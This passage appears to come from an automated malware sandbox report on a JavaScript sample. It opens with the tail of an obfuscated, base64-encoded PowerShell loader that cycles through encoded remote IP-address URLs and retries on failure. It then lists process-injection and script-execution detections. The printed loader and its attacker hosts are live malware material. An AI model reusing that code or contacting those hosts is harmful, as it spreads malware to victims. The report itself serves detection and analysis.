AeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1664 resumed a thread in remote process 2616
Process injection	Process 2616 resumed a thread in remote process 2736
NtResumeThread May 25, 2023, 10:43 a.m.	thread_handle: 0x00000308 suspend_count: 1 process_identifier: 2616	1	0	0
NtResumeThread May 25, 2023, 10:43 a.m.	thread_handle: 0x000002f0 suspend_count: 1 process_identifier: 2736	1	0	0

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

exocoetidae.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All